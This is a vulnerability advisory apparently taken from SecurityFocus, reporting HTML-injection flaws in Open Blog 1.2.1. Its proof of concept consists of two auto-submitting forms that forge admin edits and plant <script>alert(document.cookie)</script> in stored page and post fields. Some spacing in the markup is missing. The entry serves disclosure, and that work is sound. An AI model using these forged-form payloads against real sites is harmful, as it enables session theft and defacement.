source: https://www.securityfocus.com/bid/42255/info
Tomaž Muraus Open Blog is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Tomaž Muraus Open Blog 1.2.1is vulnerable; prior versions may also be affected.<form action="http://www.example.com/admin/pages/edit" method="post"><inputtype="hidden" name="title" value="open blog page title"/><inputtype="hidden" name="content" value='Some page content and <script>alert(document.cookie)</script>'/><inputtype="hidden" name="status" value="active"/><inputtype="hidden" name="id" value="1"/><inputtype="submit" name="submit"id="sbmtit" value="Edit ››"/></form><script>
document.getElementById('sbmtit').click();</script><form action="http://www.example.com/admin/posts/edit" method="post"><inputtype="hidden" name="title" value="Welcome to Open Blog"/><inputtype="hidden" name="excerpt" value='Some text"><script>alert(document.cookie)</script>'/><inputtype="hidden" name="content" value=""/><inputtype="hidden" name="categories[]" value="1"/><inputtype="hidden" name="tags" value="openblog"/><inputtype="hidden" name="publish_date" value="13/07/2010"/><inputtype="hidden" name="status" value="published"/><inputtype="hidden" name="id" value="1"/><inputtype="submit" name="submit"id="sbmtit" value="Edit ››"/></form><script>
document.getElementById('sbmtit').click();</script>
